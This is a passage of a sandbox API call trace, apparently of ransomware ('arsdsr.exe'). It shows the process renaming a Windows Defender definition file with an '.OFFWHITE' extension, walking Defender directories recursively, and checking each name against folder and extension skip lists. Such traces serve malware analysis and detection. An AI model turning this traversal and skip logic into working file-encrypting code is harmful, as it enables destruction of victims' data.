hFile=0x218, lpBuffer=0x2960048*, nNumberOfBytesToWrite=0x52d90, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2960048*, lpNumberOfBytesWritten=0x295d1cc*=0x52d90, lpOverlapped=0x0) returned 1 [0147.116] GetProcessHeap () returned 0x500000 [0147.116] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960048 | out: hHeap=0x500000) returned 1 [0147.116] CloseHandle (hObject=0x218) returned 1 [0147.116] GetProcessHeap () returned 0x500000 [0147.116] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565338 | out: hHeap=0x500000) returned 1 [0147.116] GetProcessHeap () returned 0x500000 [0147.117] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565230 | out: hHeap=0x500000) returned 1 [0147.117] GetProcessHeap () returned 0x500000 [0147.117] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a60 | out: hHeap=0x500000) returned 1 [0147.117] GetProcessHeap () returned 0x500000 [0147.117] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a48 | out: hHeap=0x500000) returned 1 [0147.117] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" [0147.117] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.OFFWHITE" [0147.117] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm"), lpNewFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpasdlta.vdm.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\definition updates\\{d2b0b133-42ed-44d3-809a-46ebb62ba863}\\mpasdlta.vdm.offwhite")) returned 1 [0147.118] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x93b6800, ftLastWriteTime.dwHighDateTime=0x1cb85c9, nFileSizeHigh=0x0, nFileSizeLow=0x7d1d50, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="mpengine.dll", cAlternateFileName="")) returned 1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2=".") returned 1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="..") returned 1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="...") returned 1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="windows") returned -1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="$recycle.bin") returned 1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="rsa") returned -1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="ntuser.dat") returned -1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="programdata") returned -1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="appdata") returned 1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="program files") returned -1 [0147.118] lstrcmpiW (lpString1="mpengine.dll", lpString2="program files (x86)") returned -1 [0147.118] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\" [0147.118] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\", lpString2="mpengine.dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\{D2B0B133-42ED-44D3-809A-46EBB62BA863}\\mpengine.dll" [0147.118] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0147.118] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0147.118] PathFindExtensionW (pszPath="mpengine.dll") returned=".dll" [0147.118] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0147.118] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0147.119] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0147.119] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0147.119] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0147.119] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0147.119] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0147.119] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0147.119] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x93b6800, ftLastWriteTime.dwHighDateTime=0x1cb85c9, nFileSizeHigh=0x0, nFileSizeLow=0x7d1d50, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="mpengine.dll", cAlternateFileName="")) returned 0 [0147.119] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0147.119] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1fb3099, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x1fff35a, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fff35a, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="{D2B0B133-42ED-44D3-809A-46EBB62BA863}", cAlternateFileName="{D2B0B~1")) returned 0 [0147.119] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.119] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="LocalCopy", cAlternateFileName="LOCALC~1")) returned 1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2=".") returned 1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="..") returned 1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="...") returned 1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="windows") returned -1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="$recycle.bin") returned 1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="rsa") returned -1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="ntuser.dat") returned -1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="programdata") returned -1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="appdata") returned 1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="program files") returned -1 [0147.119] lstrcmpiW (lpString1="LocalCopy", lpString2="program files (x86)") returned -1 [0147.119] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\" [0147.120] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="LocalCopy" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" [0147.120] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\" [0147.120] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\" [0147.120] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*.*" [0147.120] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.120] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.120] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.120] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.120] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.120] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0147.120] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.120] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0147.120] lstrcmpiW (lpString1="Quarantine", lpString2=".") returned 1 [0147.120] lstrcmpiW (lpString1="Quarantine", lpString2="..") returned 1 [0147.120] lstrcmpiW (lpString1="Quarantine", lpString2="...") returned 1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="windows") returned -1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="$recycle.bin") returned 1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="rsa") returned -1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="ntuser.dat") returned 1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="programdata") returned 1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="appdata") returned 1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="program files") returned 1 [0147.121] lstrcmpiW (lpString1="Quarantine", lpString2="program files (x86)") returned 1 [0147.121] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\" [0147.121] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Quarantine" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" [0147.121] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\" [0147.121] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\" [0147.121] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*.*" [0147.121] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.121] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.121] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.121] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.121] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.121] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 0 [0147.122] FindClose (in: hFindFile=0x544590 | out: hFindFile=0x544590) returned 1 [0147.122] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Scans", cAlternateFileName="")) returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2=".") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="..") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="...") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="windows") returned -1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="$recycle.bin") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="rsa") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="ntuser.dat") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="programdata") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="appdata") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="program files") returned 1 [0147.122] lstrcmpiW (lpString1="Scans", lpString2="program files (x86)") returned 1 [0147.122] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\" [0147.122] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Scans" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans" [0147.122] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\" [0147.122] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\" [0147.122] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*" [0147.122] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0147.126] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.126] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7690f9e4, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x7690f9e4, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0147.126] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.126] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.126] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="History", cAlternateFileName="")) returned 1 [0147.126] lstrcmpiW (lpString1="History", lpString2=".") returned 1 [0147.126] lstrcmpiW (lpString1="History", lpString2="..") returned 1 [0147.126] lstrcmpiW (lpString1="History", lpString2="...") returned 1 [0147.126] lstrcmpiW (lpString1="History", lpString2="windows") returned -1 [0147.126] lstrcmpiW (lpString1="History", lpString2="$recycle.bin") returned 1 [0147.126] lstrcmpiW (lpString1="History", lpString2="rsa") returned -1 [0147.126] lstrcmpiW (lpString1="History", lpString2="ntuser.dat") returned -1 [0147.126] lstrcmpiW (lpString1="History", lpString2="programdata") returned -1 [0147.126] lstrcmpiW (lpString1="History", lpString2="appdata") returned 1 [0147.126] lstrcmpiW (lpString1="History", lpString2="program files") returned -1 [0147.126] lstrcmpiW (lpString1="History", lpString2="program files (x86)") returned -1 [0147.126] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\" [0147.126] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\", lpString2="History" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History" [0147.126] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" [0147.126] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" [0147.126] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*" [0147.127] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x70006e, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0147.127] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0147.127] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7690f9e4, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x244fb42, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x244fb42, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x70006e, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0147.127] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0147.127] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0147.127] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x76b24d28, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0xcfc0a7e0, ftLastAccessTime.dwHighDateTime=0x1d2faf9, ftLastWriteTime.dwLowDateTime=0xcfc0a7e0, ftLastWriteTime.dwHighDateTime=0x1d2faf9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x70006e, dwReserved1=0x295dcf0, cFileName="CacheManager", cAlternateFileName="CACHEM~1")) returned 1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2=".") returned 1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="..") returned 1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="...") returned 1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="windows") returned -1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="$recycle.bin") returned 1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="rsa") returned -1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="ntuser.dat") returned -1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="programdata") returned -1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="appdata") returned 1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="program files") returned -1 [0147.127] lstrcmpiW (lpString1="CacheManager", lpString2="program files (x86)") returned -1 [0147.127] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\" [0147.128] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\", lpString2="CacheManager" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager" [0147.128] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\" [0147.128] lstrcpyW (in: lpString1=0x295cff0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\" [0147.128] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows 